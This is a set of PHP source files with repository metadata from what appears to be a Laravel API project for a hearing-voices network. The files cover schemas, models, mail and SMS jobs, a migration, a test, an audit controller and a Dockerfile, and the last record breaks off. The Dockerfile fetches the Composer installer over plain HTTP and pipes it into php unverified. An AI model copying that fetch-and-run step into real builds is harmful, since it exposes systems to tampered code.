"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Notification;\n\nuse App\\Models\\Notification;\nuse App\\Support\\Enum;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass NotificationSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('admin_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('end_user_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('channel')\n ->enum(...(new Enum(Notification::class))->getValues('CHANNEL')),\n Schema::string('recipient'),\n Schema::string('content'),\n Schema::string('sent_at')\n ->format(static::FORMAT_DATE_TIME)\n ->nullable(),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6615259647369385,
"alphanum_fraction": 0.6623376607894897,
"avg_line_length": 33.22222137451172,
"blob_id": "4fd75648bc4f15ad08262d62b446d33aafa52e9b",
"content_id": "ee0e0fbb568f8a0b980c728cfa8f901be6816198",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 36,
"path": "/app/Docs/Paths/Contributions/ContributionsApprovePath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Contributions;\n\nuse App\\Docs\\Operations\\Contributions\\ApproveContributionOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ContributionsApprovePath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/contributions/{contribution}/approve')\n ->parameters(\n Parameter::path()\n ->name('contribution')\n ->description('The ID of the contribution')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ApproveContributionOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5996472835540771,
"alphanum_fraction": 0.6005290746688843,
"avg_line_length": 20.39622688293457,
"blob_id": "7ed5237a6705da1c56b6d00c567c0c85c99486d0",
"content_id": "42d2a02726bfeb46a2a55d28d740895ef10a47cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1134,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 53,
"path": "/app/Models/FileToken.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass FileToken extends Model\n{\n use Mutators\\FileTokenMutators;\n use Relationships\\FileTokenRelationships;\n use Scopes\\FileTokenScopes;\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * @return bool\n */\n public function hasExpired(): bool\n {\n return Date::now()->greaterThan(\n $this->created_at->addSeconds(\n Config::get('connecting_voices.file_tokens.expiry_time')\n )\n );\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function isForAdmin(Admin $admin): bool\n {\n return $this->user_id === $admin->user_id;\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function isValid(Admin $admin): bool\n {\n return !$this->hasExpired() && $this->isForAdmin($admin);\n }\n}\n"
},
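`hasExpired()` above reads its window from `config('connecting_voices.file_tokens.expiry_time')`. A sketch of the matching entry in a hypothetical `config/connecting_voices.php`; the key path is taken from the code, but the 60-second value is an assumption:

```php
return [
    // ...
    'file_tokens' => [
        'expiry_time' => 60, // Seconds a download token stays valid (assumed value).
    ],
];
```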
{
"alpha_fraction": 0.6760082244873047,
"alphanum_fraction": 0.6766917109489441,
"avg_line_length": 35.57500076293945,
"blob_id": "aa5b483e74fe66fe045d56020f08fb66e9b23451",
"content_id": "3e6d77e1006d54ea452181991a621cde228d754c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1463,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 40,
"path": "/app/Docs/Paths/Contributions/ContributionsNestedPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Contributions;\n\nuse App\\Docs\\Operations\\Contributions\\DestroyContributionOperation;\nuse App\\Docs\\Operations\\Contributions\\ShowContributionOperation;\nuse App\\Docs\\Operations\\Contributions\\UpdateContributionOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ContributionsNestedPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/contributions/{contribution}')\n ->parameters(\n Parameter::path()\n ->name('contribution')\n ->description('The ID of the contribution')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ShowContributionOperation::create(),\n UpdateContributionOperation::create(),\n DestroyContributionOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.537484884262085,
"alphanum_fraction": 0.5380894541740417,
"avg_line_length": 17.584270477294922,
"blob_id": "2ae36b78aeb008fac3f7c5526555c9b74940094a",
"content_id": "f0eb1fb6058a57ea37a35abcd82d5b4d4f3ecbfa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1654,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 89,
"path": "/app/Mail/GenericMail.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Mail;\n\nuse Illuminate\\Bus\\Queueable;\nuse Illuminate\\Contracts\\Mail\\Mailer;\nuse Illuminate\\Contracts\\Queue\\ShouldQueue;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Mail\\Message;\nuse Illuminate\\Queue\\InteractsWithQueue;\n\nclass GenericMail implements ShouldQueue\n{\n use Dispatchable;\n use InteractsWithQueue;\n use Queueable;\n\n /**\n * @var string\n */\n protected $to;\n\n /**\n * @var string\n */\n protected $subject;\n\n /**\n * @var string\n */\n protected $body;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $subject\n * @param string $body\n */\n public function __construct(string $to, string $subject, string $body)\n {\n $this->to = $to;\n $this->subject = $subject;\n $this->body = $body;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\Illuminate\\Contracts\\Mail\\Mailer $mailer\n */\n public function handle(Mailer $mailer): void\n {\n $mailer->raw(\n $this->body,\n function (Message $message): void {\n $message\n ->to($this->to)\n ->subject($this->subject);\n }\n );\n }\n\n /**\n * @return string\n */\n public function getTo(): string\n {\n return $this->to;\n }\n\n /**\n * @return string\n */\n public function getSubject(): string\n {\n return $this->subject;\n }\n\n /**\n * @return string\n */\n public function getBody(): string\n {\n return $this->body;\n }\n}\n"
},
{
"alpha_fraction": 0.5139057040214539,
"alphanum_fraction": 0.514308750629425,
"avg_line_length": 28.188236236572266,
"blob_id": "aca2dad7e362444a29d91134472bdc7709fc75c5",
"content_id": "28e7def808aba1e3685f11c0ab0f1d70c78ffbb9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2481,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 85,
"path": "/database/migrations/2019_05_28_172828_create_tags_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\nuse Illuminate\\Support\\Str;\n\nclass CreateTagsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('tags', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('parent_tag_id')->nullable();\n $table->string('name');\n $table->timestamp('created_at')->useCurrent();\n $table->timestamp('updated_at')->useCurrent();\n $table->softDeletes();\n });\n\n Schema::table('tags', function (Blueprint $table): void {\n $table->foreign('parent_tag_id')->references('id')->on('tags');\n });\n\n DB::table('tags')->insert($this->getTags());\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('tags');\n }\n\n /**\n * @return array\n */\n protected function getTags(): array\n {\n // Get the path of the tags JSON file.\n $tagsPath = realpath(dirname(__DIR__)) . '/storage/tags.json';\n\n // Decode the JSON file into an associative array.\n $tags = json_decode(file_get_contents($tagsPath), true);\n\n /*\n * Prepare the empty parsed tags array, as the JSON object is not in the format matching\n * the database.\n */\n $parsedTags = [];\n\n // Loop through each parent tag.\n foreach ($tags as $parent => $children) {\n // Parse the tag into a format that can be inserted into the database.\n $parentTag = [\n 'id' => Str::uuid()->toString(),\n 'parent_tag_id' => null,\n 'name' => $parent,\n ];\n $parsedTags[] = $parentTag;\n\n // Loop through each child tag of the current parent.\n foreach ($children as $child) {\n /*\n * Parse the tag into a format that can be inserted into the database, and link to\n * the parent.\n */\n $parsedTags[] = [\n 'id' => Str::uuid()->toString(),\n 'parent_tag_id' => $parentTag['id'],\n 'name' => $child,\n ];\n }\n }\n\n return $parsedTags;\n }\n}\n"
},
{
"alpha_fraction": 0.5795228481292725,
"alphanum_fraction": 0.5805168747901917,
"avg_line_length": 21.863636016845703,
"blob_id": "38411cf05cccf80ee636b977202ee06781deae83",
"content_id": "e58b12c24a7a575c88f291543552292d86a64f4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1006,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 44,
"path": "/tests/Unit/Rules/ParentTagIsTopLevelTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Models\\Tag;\nuse App\\Rules\\ParentTagIsTopLevel;\nuse Tests\\TestCase;\n\nclass ParentTagIsTopLevelTest extends TestCase\n{\n /** @test */\n public function it_passes_for_top_level_tag(): void\n {\n $tag = factory(Tag::class)->create();\n $rule = new ParentTagIsTopLevel();\n\n $result = $rule->passes('test', $tag->id);\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_for_child_level_tag(): void\n {\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => factory(Tag::class)->create()->id,\n ]);\n $rule = new ParentTagIsTopLevel();\n\n $result = $rule->passes('test', $tag->id);\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new ParentTagIsTopLevel();\n\n $this->assertEquals('The parent tag must be a top level tag.', $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.7002288103103638,
"alphanum_fraction": 0.7199084758758545,
"avg_line_length": 34.819671630859375,
"blob_id": "a57775dd40d1c04ac9c22e0eebe4ae9eeb6fb14f",
"content_id": "2718b231c9dbf2235a5ef72acbf5452170c9e5f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 2185,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 61,
"path": "/docker/app/Dockerfile",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Set base image.\nFROM ubuntu:18.04\n\n# Set maintainer to Ayup Digital.\nLABEL maintainer=\"Ayup Digital\"\n\n# Install generic software.\nRUN apt-get update \\\n && apt-get install -y locales nginx curl zip unzip git software-properties-common supervisor \\\n && locale-gen en_GB.UTF-8\n\n# Set needed environment variables before installing PHP.\nENV DEBIAN_FRONTEND noninteractive\nENV LANG en_GB.UTF-8\nENV LANGUAGE en_GB:en\nENV LC_ALL en_GB.UTF-8\n\n# Install PHP.\nRUN apt-add-repository -y ppa:ondrej/php \\\n && apt-get update \\\n && apt-get install -y php7.3-fpm php7.3-cli php7.3-gd php7.3-mysql php7.3-redis \\\n php7.3-imap php7.3-mbstring php7.3-xml php7.3-curl php7.3-zip php-xdebug \\\n && php -r \"readfile('http://getcomposer.org/installer');\" | php -- --install-dir=/usr/bin/ --filename=composer \\\n && mkdir /run/php \\\n && apt-get remove -y --purge software-properties-common \\\n && apt-get -y autoremove \\\n && apt-get clean \\\n && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*\n\n# Set system timezone to Europe/London.\nRUN unlink /etc/localtime \\\n && ln -s /usr/share/zoneinfo/Europe/London /etc/localtime\n\n# Redirect NGINX output to stdout and stderr.\nRUN ln -sf /dev/stdout /var/log/nginx/access.log \\\n && ln -sf /dev/stderr /var/log/nginx/error.log\n\n# Copy configuration files over for installed software.\nCOPY etc/nginx/nginx.conf /etc/nginx/nginx.conf\nCOPY etc/nginx/sites-available/default /etc/nginx/sites-available/default\nCOPY etc/php/7.3/fpm/php-fpm.conf /etc/php/7.3/fpm/php-fpm.conf\nCOPY etc/php/7.3/fpm/php.ini /etc/php/7.3/fpm/php.ini\nCOPY etc/php/7.3/cli/php.ini /etc/php/7.3/cli/php.ini\nCOPY etc/supervisor/conf.d/supervisord.conf /etc/supervisor/conf.d/supervisord.conf\n\n# Copy the bootstrap script over and make executable.\nCOPY /usr/local/bin/start-container /usr/local/bin/start-container\nRUN chmod +x /usr/local/bin/start-container\n\n# Copy the packaged app (only used when deploying).\nCOPY packaged /var/www/html\nRUN chown -R www-data: /var/www/html\n\n# Expose port 80 for HTTP access.\nEXPOSE 80\n\n# Set the working directory to the project root.\nWORKDIR /var/www/html\n\n# Set default command to the bootstrap script.\nCMD [\"start-container\"]\n"
},
{
"alpha_fraction": 0.5508274435997009,
"alphanum_fraction": 0.5543735027313232,
"avg_line_length": 18.674419403076172,
"blob_id": "bf39f0cda0c097ffbe5e1c4802b93acc2b10ab3c",
"content_id": "023775006e53b601282b18a6e2a7568f9743db29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 846,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 43,
"path": "/app/Console/Commands/Cv/Schedule/LoopCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Schedule;\n\nuse Illuminate\\Console\\Command;\n\nclass LoopCommand extends Command\n{\n const ONE_MINUTE = 60;\n\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = 'cv:schedule:loop';\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Runs the scheduler every minute';\n\n /**\n * Execute the console command.\n */\n public function handle(): void\n {\n while (true) {\n $start = time();\n $this->call('schedule:run');\n $end = time();\n\n $timeTaken = $end - $start;\n $timeUntilOneMinute = static::ONE_MINUTE - $timeTaken;\n\n sleep($timeUntilOneMinute);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6430529952049255,
"alphanum_fraction": 0.6439670920372009,
"avg_line_length": 28.97260284423828,
"blob_id": "a24e0428a091ab23a64bd1f8552f406a74989f80",
"content_id": "16f98af5693e30f245ef88a881daa3c4f223f37b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2188,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 73,
"path": "/app/Http/Controllers/V1/AuditController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Audit\\AdminIdFilter;\nuse App\\Http\\Filters\\Audit\\EndUserIdFilter;\nuse App\\Http\\Resources\\AuditResource;\nuse App\\Models\\Audit;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass AuditController extends ApiController\n{\n /**\n * AuditController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n $this->authorizeResource(Audit::class);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Audit::query()\n ->with('user.admin', 'user.endUser', 'client');\n\n $audits = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n Filter::custom('admin_id', AdminIdFilter::class),\n Filter::custom('end_user_id', EndUserIdFilter::class),\n ])\n ->allowedSorts([\n 'created_at',\n ])\n ->defaultSort('-created_at')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all audits.'));\n\n return AuditResource::collection($audits);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Audit $audit\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Audit $audit): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed audit [{$audit->id}].\"));\n\n return new AuditResource($audit);\n }\n}\n"
},
{
"alpha_fraction": 0.6286666393280029,
"alphanum_fraction": 0.6293333172798157,
"avg_line_length": 31.60869598388672,
"blob_id": "3fa31cd21339ae9b3c586bc5abadb2fc78aa12b1",
"content_id": "71bb7a9689d26160f89be3d518e2dd0bfd8c038b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1500,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 46,
"path": "/app/Docs/Operations/Settings/IndexSettingsOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Settings;\n\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Schemas\\Setting\\SettingsSchema;\nuse App\\Docs\\Tags\\SettingsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass IndexSettingsOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all settings')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n 'Private settings will only be return for admins.'\n )\n )\n ->tags(SettingsTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, SettingsSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.643966555595398,
"alphanum_fraction": 0.6451612710952759,
"avg_line_length": 27.86206817626953,
"blob_id": "6a5d676025fea4fc13e6700feeef6da749b9e7df",
"content_id": "ee01fe8be37d9e54068a53c2f256964b3c22b9fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 837,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 29,
"path": "/app/Http/Filters/Contribution/TagIdsFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Contribution;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass TagIdsFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param array|string $tagIds\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $tagIds, string $property): Builder\n {\n // If untagged then only get contributions with no tag (excluding soft deleted tags).\n if ($tagIds === 'untagged') {\n return $query->whereDoesntHave('tags');\n }\n\n return $query->whereHas('tags', function (Builder $query) use ($tagIds): void {\n $query->whereIn('tags.id', (array)$tagIds);\n });\n }\n}\n"
},
{
"alpha_fraction": 0.5658106207847595,
"alphanum_fraction": 0.5666131377220154,
"avg_line_length": 28.66666603088379,
"blob_id": "627b632ec1f75296f57aaebc351d7b56618e28fb",
"content_id": "e7c32312ee5335f29656d52d5044550b119853ea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1246,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 42,
"path": "/app/Docs/Parameters/SortParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass SortParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @param string[] $fields\n * @param null $default\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(\n string $objectId = null,\n array $fields = [],\n $default = null\n ): BaseObject {\n $fields = empty($fields) ? '`n/a`' : '`' . implode($fields, '`,`') . '`';\n\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name('sort')\n ->description(\n <<<EOT\n Comma separated list of fields to sort by.\n The results are sorted in the order of which the fields have been provided.\n Prefix a field with `-` to indicate a descending sort.\n \n Supported fields: [{$fields}]\n EOT\n )\n ->schema(\n Schema::string()->default($default)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5795645117759705,
"alphanum_fraction": 0.5812395215034485,
"avg_line_length": 14.710526466369629,
"blob_id": "69346e1621f769d80935cabc58715905001da569",
"content_id": "3cc3366697530bbf504fb509124efea9db93ee17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 597,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 38,
"path": "/app/Events/Tag/TagSoftDeleted.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Tag;\n\nuse App\\Models\\Tag;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass TagSoftDeleted\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Tag\n */\n protected $tag;\n\n /**\n * TagCreated constructor.\n *\n * @param \\App\\Models\\Tag $tag\n */\n public function __construct(Tag $tag)\n {\n $this->tag = $tag;\n }\n\n /**\n * @return \\App\\Models\\Tag\n */\n public function getTag(): Tag\n {\n return $this->tag;\n }\n}\n"
},
{
"alpha_fraction": 0.5290006995201111,
"alphanum_fraction": 0.5296995043754578,
"avg_line_length": 31.522727966308594,
"blob_id": "555aaf876306e8777a669963829725197552c28c",
"content_id": "d88bb96210e80fda3500580d08218df7424abe3c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1431,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 44,
"path": "/app/Docs/Schemas/Audit/AuditSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Audit;\n\nuse App\\Models\\Audit;\nuse App\\Support\\Enum;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass AuditSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('admin_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('end_user_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('client')\n ->nullable(),\n Schema::string('action')\n ->enum(...(new Enum(Audit::class))->getValues('ACTION')),\n Schema::string('description'),\n Schema::string('ip_address'),\n Schema::string('user_agent')\n ->nullable(),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6176961660385132,
"alphanum_fraction": 0.6185308694839478,
"avg_line_length": 22.038461685180664,
"blob_id": "cf4a9f55da2ba46236526fcce47ba3bad979f68c",
"content_id": "92093ab1d5c5bcd1e280183d2c46658e0f9590b2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1198,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 52,
"path": "/app/Sms/TemplateSms.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Sms;\n\nuse App\\VariableSubstitution\\VariableSubstituter;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass TemplateSms extends GenericSms\n{\n /**\n * @var \\App\\VariableSubstitution\\VariableSubstituter\n */\n protected $substituter;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $body\n * @param \\App\\VariableSubstitution\\VariableSubstituter $substituter\n */\n public function __construct(string $to, string $body, VariableSubstituter $substituter)\n {\n parent::__construct($to, $body);\n\n $this->substituter = $substituter;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\App\\Sms\\SmsSender $sender\n */\n public function handle(SmsSender $sender): void\n {\n $sender->send(\n Config::get('sms.from'),\n $this->substituter->substitute($this->to),\n $this->substituter->substitute($this->body)\n );\n }\n\n /**\n * @return \\App\\VariableSubstitution\\VariableSubstituter\n */\n public function getSubstituter(): VariableSubstituter\n {\n return $this->substituter;\n }\n}\n"
},
{
"alpha_fraction": 0.5537609457969666,
"alphanum_fraction": 0.5542224049568176,
"avg_line_length": 20.88888931274414,
"blob_id": "e587659b7ae57903271ea05876648c995d777111",
"content_id": "40a2e634016c492ec354a5e3ac16f4392d009886",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2167,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 99,
"path": "/app/Policies/EndUserPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
